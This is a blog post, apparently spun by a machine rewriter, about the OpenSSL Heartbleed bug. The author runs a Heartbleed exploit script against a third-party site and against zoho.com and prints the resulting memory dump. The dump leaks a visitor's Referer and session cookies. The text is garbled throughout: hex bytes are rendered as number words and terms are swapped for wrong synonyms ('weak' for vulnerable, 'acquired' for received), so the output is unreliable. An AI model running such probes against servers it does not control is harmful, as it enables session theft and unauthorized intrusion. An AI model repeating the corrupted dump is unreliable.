Heart Bleed Bug – OpenSSL – part 2

I keep greater than 30 servers and a number of other of them was affected with Heartbleed bug. CentOS launched update for OpenSSL package deal(s) so there are not any excuses to not update (yum update openssl, … ).

In the meantime, there are a whole lot of sysadmins which nonetheless didn’t do something to guard their servers and shoppers (https://gist.github.com/dberkholz/10169691).

Testing REMOVED.com for instance:

[email protected] ~/Downloads $   ./check.py REMOVED.com Connecting... Sending Client Hello... Waiting for Server Hello...  ... acquired message: sort = 22, ver = 0302, size = fifty eight  ... acquired message: sort = 22, ver = 0302, size = 4837  ... acquired message: sort = 22, ver = 0302, size = A Sending heartbeat request...  ... acquired message: sort = 24, ver = 0302, size = 16384 Received heartbeat response:   0000: 02 forty 00 D8 03 02 fifty three forty three 5B ninety 9D 9B seventy two 0B BC 0C  [email protected][...r...   0010: BC 2B ninety two A8 forty eight ninety seven CF BD 39 04 CC sixteen 0A eighty five 03 ninety  .+..T...N.......   0020: 9F seventy seven 04 33 D4 DE 00 00 sixty six C0 14 C0 0A C0 22 C0  .w.O....f.....".   0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00  !.N.H.........H.   0040: eighty four C0 12 C0 08 C0 1C C0 1B 00 sixteen 00 thirteen C0 0D C0  ................   0050: 03 00 0A C0 thirteen C0 09 C0 1F C0 1E 00 33 00 32 00  ............O.2.   0060: 9A 00 ninety nine 00 forty five 00 forty four C0 0E C0 04 00 2F 00 ninety six 00  ....W.A...../...   0070: forty one C0 eleven C0 07 C0 0C C0 02 00 05 00 04 00 15 00  A...............   0080: 12 00 09 00 14 00 eleven 00 08 00 06 00 03 00 FF 01  ................   0090: 00 00 forty nine 00 0B 00 04 03 00 01 02 00 0A 00 34 00  ..I...........A.   00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00  2...............   00b0: 0A 00 sixteen 00 17 00 08 00 06 00 07 00 14 00 15 00  ................   00c0: 04 00 05 00 12 00 thirteen 00 01 00 02 00 03 00 0F 00  ................   00d0: 10 00 eleven 00 23 00 00 00 0F 00 01 01 sixty seven 3A 20 sixty seven  ....#.......g: g   00e0: 7A sixty nine 70 2C 20 sixty four sixty five sixty six 6C sixty one seventy four sixty five 0D 0A fifty two sixty five  zip, deflate..Re   00f0: sixty six sixty five seventy two sixty five seventy two 3A 20 sixty eight seventy four seventy four 70 seventy three 3A 2F 2F seventy seven  ferer: https://w   0100: seventy seven seventy seven 2E seventy four 6F seventy three sixty eight sixty nine sixty two sixty one 2E sixty three 6F 6D 2F seventy four  ww.REMOVED.com/t   0110: sixty nine sixty three 2F 70 seventy two 6F sixty four seventy five sixty three seventy four 2F seventy six 32 30 30 30  ic/product/v2000   0120: 2D seventy three sixty five seventy two sixty nine sixty five seventy three 2D seventy three 6D sixty one 6C 6C 2D 70 6C  -collection-small-pl   0130: sixty three seventy three 0D 0A forty three 6F 6F 6B sixty nine sixty five 3A 20 4A fifty three forty five fifty three  cs..Cookie: JSES   0140: fifty three forty nine 4F 4E forty nine forty four 3D forty four 39 37 36 34 38 30 32 30  SIONID=D97648020   0150: forty one forty five 36 32 31 forty six forty five forty one 31 forty four 38 forty five 30 37 33 forty two  AE621FEA1D8E073B   0160: forty two 38 31 forty four forty four 32 36 2E seventy four sixty one 3B 20 sixty three sixty nine seventy four seventy two  B81DD26.ta; citr   0170: sixty nine seventy eight 5F 6E seventy three 5F sixty nine sixty four 3D sixty two 35 fifty three 33 fifty eight 6A 6B  ix_ns_id=b5S3Xjk   0180: 4A forty nine fifty nine 4B fifty three 31 6E forty two 2F 31 forty five seventy three 4B 6C fifty eight forty six  JIYKS1nB/1EsKlXF   0190: 6D 70 seventy one forty five forty one 30 30 30 0D 0A forty three 6F 6E 6E sixty five sixty three  mpqEA000..Connec   01a0: seventy four sixty nine 6F 6E 3A 20 6B sixty five sixty five 70 2D sixty one 6C sixty nine seventy six sixty five  tion: hold-alive   01b0: 0D 0A forty nine sixty six 2D 4D 6F sixty four sixty nine sixty six sixty nine sixty five sixty four 2D fifty three sixty nine  ..If-Modified-Si   01c0: 6E sixty three sixty five 3A 20 fifty four seventy five sixty five 2C 20 30 35 20 4E 6F seventy six  nce: Tue, 05 Nov   01d0: 20 32 30 31 33 20 31 34 3A 32 30 3A 33 34 20 forty seven   2013 14:20:34 M   01e0: 4D fifty four 0D 0A 0D 0A sixty nine sixty five 1F 0E 88 sixty five 6C forty eight 9C E1  MT....ie...elH..   01f0: 7C 8F FD AC 1C ninety three.......~.......   0200: 0D 0A forty nine sixty six 2D 4E 6F 6E sixty five 2D 4D sixty one seventy four sixty three sixty eight 3A  ..If-None-Match:   0210: 20 22 31 sixty one sixty six 38 36 31 2D 37 34 2D 34 sixty four sixty six 32   "1af861-seventy four-4df2   0220: 32 34 31 34 38 39 33 30 30 22 0D 0A 0D 0A 4E 1A  241489300"....I. ....   3fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................   3fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................   3fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................   3ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................   WARNING: server returned extra knowledge than it ought to - server is weak!

For safety causes, actual area which I examined is changed with "REMOVED”

Some hosts from the record I posted above are already patched (which is sweet)

[email protected] ~/Downloads $   ./check.py zoho.com Connecting... Sending Client Hello... Waiting for Server Hello...  ... acquired message: sort = 22, ver = 0302, size = sixty six  ... acquired message: sort = 22, ver = 0302, size = 2399  ... acquired message: sort = 22, ver = 0302, size = 331  ... acquired message: sort = 22, ver = 0302, size = A Sending heartbeat request... Unexpected EOF receiving document header - server closed connection No heartbeat response acquired, server doubtless not weak

Throwing rocks to OpenSSL builders isn't the great concept. Donating cash for paid builders is a lot better choice…

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

We use cookies to give you the best online experience. By agreeing you accept the use of cookies in accordance with our cookie policy.